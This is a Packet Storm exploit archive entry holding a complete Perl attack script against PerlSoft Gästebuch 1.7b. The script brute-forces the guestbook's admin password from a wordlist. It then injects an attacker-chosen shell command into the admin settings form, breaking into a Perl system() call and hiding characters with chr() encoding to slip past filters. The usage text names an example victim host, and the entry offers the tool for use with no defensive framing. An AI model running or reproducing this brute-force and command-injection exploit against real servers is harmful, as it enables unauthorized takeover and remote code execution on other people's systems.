PerlSoft Gastebuch 1.7b Code Execution

2009-01-30T00:00:00
ID PACKETSTORM:74486
Type packetstorm
Reporter Perforin
Modified 2009-01-30T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
=pod  
Typ: Bruter & RCE  
Name: PerlSoft GB Pwner  
Affected Software: PerlSoft Gästebuch Version: 1.7b  
Coder/Bugfounder: Perforin  
Visit: DarK-CodeZ.org  
Note: RCE ist only 1 time possible, do not waste your command!  
=cut  
  
use strict;  
use warnings;  
use diagnostics;  
  
use LWP::Simple;  
use LWP::Simple::Post qw(post post_xml);  
  
my ($url,$user,$wordlist,$error_counter,$word,$anfrage);  
my ($falsch,$richtig,$entry,$rce,$send,$crypted);  
my (@response,@rcesend,@array);  
  
if (@ARGV < 4) { &fail; }  
  
($url,$user,$wordlist) = (@ARGV);  
  
$falsch = '<tr><td align=center><Font color="000000" FACE="Arial">Nur Administratoren mit gültigen Benutzerdaten haben Zugang in das Admin-Center!</font></td></tr>';  
$richtig = '<tr><td bgcolor=#E0E0E0 align=center><B><Font color="000000" FACE="Arial">Gästebuch Vorlage - Einstellen</font></B></td></tr>';  
  
if ($url !~ m/^http:\/\//) { &fail; }  
if ($wordlist !~ m/\.(txt|list|dat)$/) { &fail; }  
  
print <<"show";  
  
--==[Perforins PerlSoft GB Pwner]==--  
  
[+] Attack: $url  
[+] User: $user  
[+] Wordlist: $wordlist  
  
show  
open(WordList,"<","$wordlist") || die "No wordlist found!";  
foreach $word (<WordList>) {  
chomp($word);  
$crypted = crypt($word,"codec");  
$anfrage = $url.'?sub=vorlage&id='.$user.'&pw='.$crypted;  
@array = get($anfrage) || (print "[-] Cannot connect!\n") && exit;  
foreach $entry (@array) {  
if ($entry =~ m/$richtig/i) {   
print "\n[+] Password cracked: "."$crypted:$word"." !\n\n";  
if ($ARGV[3] =~ m/yes/i ) {  
print <<"RCE";  
[+] Remote Command Execution possible!  
[~] Note: Only _1_ time exploitable, do not waste it!  
[+] Please enter your Command!  
RCE  
chomp($rce = <STDIN>);  
$rce =~ s/>/\"\.chr(62)\.\"/ig;  
$rce =~ s/</\"\.chr(60)\.\"/ig;  
$rce =~ s/\|/\"\.chr(124)\.\"/ig;  
$rce =~ s/&/\"\.chr(38)\.\"/ig;  
$rce =~ s/\//\"\.chr(47)\.\"/ig;  
$rce =~ s/-/\"\.chr(45)\.\"/ig;  
$send = 'loginname='.$user.'&loginpw='.$word.'&loginname1='.$user.'";system("'.$rce.'");print "h4x&loginpw1='.$word.'&loginpw2='.$word.'&id='.$user.'&pw='.$crypted.'&sub=saveadmindaten';  
@response = post($url, $send);  
@rcesend = get($url) || (print "[-] Cannot connect!\n") && exit;  
print <<"END";  
[+] Command executed!  
  
---====[www.vx.perforin.de.vu]====---  
END  
exit;  
} else { (print "---====[www.vx.perforin.de.vu]====---\n") and exit; }  
} elsif ($entry =~ m/$falsch/i) {  
$error_counter++;  
print "[~] Tested ".$error_counter.": "."$crypted:$word"."\n";  
}  
}  
}  
close(WordList);  
print "[-] Could not be cracked!\n";  
exit;  
sub fail {  
print <<"CONFIG";  
+-------------------+  
| |  
| PerlSoft GB Pwner |  
| v0.1 |  
| |  
+-------------------+-----[Coded by Perforin]-----------------------------+  
| |  
| brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt yes |  
| brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt no |  
| |  
| yes = Remote Command Execution |  
| no = No Remote Command Execution |  
| |  
+-------------------------[vx.perforin.de.vu]-----------------------------+  
CONFIG  
exit;  
}  
  
`